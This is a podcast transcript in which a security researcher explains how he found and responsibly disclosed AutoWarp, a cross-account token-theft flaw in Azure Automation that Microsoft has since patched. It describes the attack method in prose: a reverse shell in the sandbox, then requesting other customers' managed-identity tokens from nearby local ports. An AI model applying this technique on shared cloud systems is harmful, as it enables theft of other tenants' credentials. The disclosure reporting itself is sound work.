AutoWarp bug leads to Automation headaches.
Dave Bittner: Hello, everyone, and welcome to the CyberWire's "Research Saturday." I'm Dave Bittner, and this is our weekly conversation with researchers and analysts tracking down threats and vulnerabilities, solving some of the hard problems of protecting ourselves in a rapidly evolving cyberspace. Thanks for joining us.
Yanir Tsarimi: I was looking for a new research target, and I somehow randomly got to Azure Automation, and, like, it made my - like, my eyes pop up, and I thought, like, OK, this might be interesting, and I wanted to look further.
Dave Bittner: That's Yanir Tsarimi. He's a cloud security researcher at Orca Security. The research we're discussing today is titled "Autowarp: Critical Cross-Account Vulnerability in Microsoft Azure Automation Service."
Yanir Tsarimi: So this is, like, how I got it - how I got to it. It was really, really random. Some may say it was, like, a stroke of luck, like how it all went down, but it was really like - it's my job. I like it. I do the research, and I got specifically to Azure Automation, like, in a random way.
Dave Bittner: Well, there is that old saying that luck favors the prepared mind, so I suppose, one way, you know, you were primed to notice something that caught your attention, as you say. So walk me through this. I mean, what exactly was it that caught your eye?
Yanir Tsarimi: So when I was looking at the automation service, I saw that you can upload scripts, and it will run them inside the environment of Azure. And I was like, OK, so let's see what I can do with it. So I uploaded a simple Python script, and I started a reversal. So I had, like, a reversal inside the environment. So I was just, like, typing up commands and looking around - what processes are running inside, what files are there? And I was looking around in the file system, and I remember that I've seen, like, a strange directory in the C hard drive.
Yanir Tsarimi: So I was looking at the directory, and inside I saw a log file. So it was, like, a folder that you don't usually see on, like, a standard Windows machine. So I was, like, looking at the log and, like, reading it. It was pretty short, like a - just a few lines. And I remember seeing, like, an HTTP URL inside the log file, and I said, OK, does an HTTP set up locally because the URL was pointing to local host, and it had, like, a weird port. The port was 40,008 - something like that. It was, like, a completely random number. Like, I didn't really understand - why would someone, like, choose this number specifically? So it's, like, something that caught my eye. So I wanted to understand - why is there a server, and why this port specifically?
Yanir Tsarimi: I started with making the requests to the local server, you know, just to see what would come up. And I got, like, arrows and, like, forbidden. So I just looked more inside the machine until I've seen that there is, like, DLL files that - those DLL files are the code of the sandbox because when you run inside the automation environment, you're basically running inside the machine with other customers, but you are supposed to be isolated from other customers. So I took this code, and I started looking into it until I found - I did a, like, reverse engineering of the code. And I saw that that server was actually an interesting server because you could actually make a request and receive the token of your managed identity.
Yanir Tsarimi: So what is the managed identity? It's basically a token that allows you to access all the resources in your Azure account. So when you have this token - for example, if I want to use Azure Automation to, like, create a new virtual machine inside my Azure account, I can use this token and give it permissions to create that virtual machine. And when I can have this token and use it, like, for all the resources, this could be interesting. So I didn't really know if this would be interesting or not because I only knew the basics at this point. The only thing that mattered to me is, like, that random number that the software engineers chose for this port, for this server.
Dave Bittner: At this point, I mean, the token that you've gotten back is your token. So am I correct there?
Yanir Tsarimi: Yeah. So I was using my own port. Like, it was, like, my own assigned server, so the token was for my account, yeah.
Dave Bittner: I see. So nothing terribly unusual there or, you know, raising any red flags when it comes to security of that?
Yanir Tsarimi: So yeah, it was - it seemed like it should be happening. Like, it seemed like a feature, not a bug. But when I thought about it, like, after a few minutes, like, I started to think, OK, when I started a new automation job, I would say that this port in the log file changed. Like, it was 40,008, and sometimes it was 40,020. Like, it was, like, around 40,000, but it changed. Like, each time I ran a new job, I got a different port. So I said, OK, they're assigning, like, a random port. So I wanted to know - like, it seemed natural to me that they were trying to create some kind of isolation because when I was researching that server, I saw that they had some kind of authentication in place and security, like, to prevent, like, unauthorized access to the server.
Yanir Tsarimi: But the problem is, when I started scanning inside the machines, I see that other ports are available, and they answer to me just like my own server. So I just started saying, OK, let's try to make the same request for the token. But instead of using my own port, I will try to use other ports around that range. So I went from 40,000 and, like, up to, like - I did try, like, 100 ports up. And I started to receive tokens. So I was like - when I saw the tokens, I was, like, taken aback. Like, OK, what is going on here? This seemed...
Dave Bittner: Is this is what I think it is?
Yanir Tsarimi: Yeah, this one, it really caught me off guard. Like, I was, like, 2 hours into looking at the service, and I thought, there's no way that something like this would be so easy. I was taking the token. And the thing with this token is it's a JWT, JSON Web Token, so you can actually, like, decrypt it in some way and, like, see what data is stored inside the token. What I did is I looked at the data of the tokens I received, and I've seen that they are attached to other customer subscriptions. So I've seen, like, subscriptions of other companies, and I've seen names and all that kind of stuff. So I was like, OK, this is an issue. Like, this is really something I shouldn't be having.
Yanir Tsarimi: So I set up, like, let's say a victim account just to try to see if I can actually access another account through this token. And I actually - it actually worked. And I was, like, even more surprised that it actually worked, like, against the Azure API. Like, if you gave any permissions, you could just use those permissions of other customers in the account. So I was, like, really, really surprised. And I was, like, holding my head. Like, I can't believe this really - it was really this simple. And I just - I, like - I don't have any more to say. Like, this - it's something, like, feels, like, a bit bizarre or surreal, something like this to happen.
Dave Bittner: Right. So at that point, what did you think? I mean, do you say to yourself, well, I - you know, I need to get in touch with Microsoft about this?
Yanir Tsarimi: Yeah. So there's this, like, standard procedure here. We do the security research and the moment we find something that we think is a security issue, like, we go straight ahead. I wrote up the report to Microsoft the same day and submitted it to them, and they fixed it within four days, I think.
Dave Bittner: And what was the fix?
Yanir Tsarimi: So the issue was that you could access - you could just ask for the tokens, right? So you had to place some kind of authentication in place or block it entirely, like, the access to the server. So Microsoft chose to mitigate this by requiring a special, like, secret token that only the customer itself should know. So when you start up a new automation job in your environment variables, you get the special token. And when you request the managed identity token from the server, you need to send them this token that you have in your environment variables.
Dave Bittner: I see. Now, one of the things you point out in the research you published online here is that Microsoft was quite responsive to you reaching out. They were a good partner here.
Yanir Tsarimi: Yeah, I was - it was a really good experience with Microsoft. Like, they responded very, very quickly to all my emails, and they were really appreciative and cooperative in, like, fixing this problem. It was really a positive experience. Like, I think that this is the thing that makes me, as a security researcher, want to keep going and keep, like, finding more security vulnerabilities and report them to the vendors who treat me, like, with respect and cooperation.
Dave Bittner: It also strikes me that, you know, part of what allowed you to get as far as you did with this was that there were several steps along the way where a lot of people would have given up or moved on to something else. And you hung in there and kept digging.
Yanir Tsarimi: Yeah, this is actually an interesting part about security research, is that you can, like, do research on one thing for, like, months and have nothing. But as long as you keep learning about your target and you just be persistent, you will find something. Like, it's the farther you go and the deeper you go, you will find issues that other people who gave up will not find. Like, there's no other way to go about it. You have to go the furthest to find the most interesting and severe vulnerabilities. In this case, it was - it all happened quite fast. But in other security research that I did, it usually took a lot longer to get to security problems like this.
Dave Bittner: And are you satisfied that this has been properly mitigated?
Yanir Tsarimi: Yes, I think Microsoft cares about those issues. And I think we have a very good reason to keep going and look for more of those.
Dave Bittner: What are your recommendations for folks to protect themselves against these sorts of things? I mean, I suppose there's no evidence that this itself was being exploited. But, you know, it strikes me as one of those things that someone using Microsoft Azure, for example, you know, they wouldn't have known that this was an issue.
Yanir Tsarimi: I can speak, like, specifically in this case, I think the concept of least privilege would be really helpful here. If you used Azure Automation and you assigned, like, the minimal permissions that you actually need, or even don't assign any permissions at all if you don't need them, so you will be at significantly less risk compared to someone who just gave all the permissions to the managed identity. Like, the concept of least privilege really shows that it matters, like, what you do and the decisions you make. Even as a customer, it can change how severe the issue can expose you.
Dave Bittner: Our thanks to Yanir Tsarimi from Orca Security for joining us. The research is titled "Auto Warp: Critical Cross Account Vulnerability in Microsoft Azure Automation Service." We'll have a link in the show notes.
Dave Bittner: The CyberWire podcast is proudly produced in Maryland out of the startup studios of DataTribe, where they're co-building the next generation of cybersecurity teams and technologies. Our amazing CyberWire team is Rachel Gelfand, Liz Irvin, Elliott Peltzman, Tre Hester, Brandon Karpf, Eliana White, Puru Prakash, Justin Sabie, Tim Nodar, Joe Carrigan, Carole Theriault, Ben Yelin, Nick Veliky, Gina Johnson, Bennett Moe, Chris Russell, John Petrik, Jennifer Eiben, Rick Howard, Peter Kilpe, and I'm Dave Bittner. Thanks for listening. We'll see you back here next week.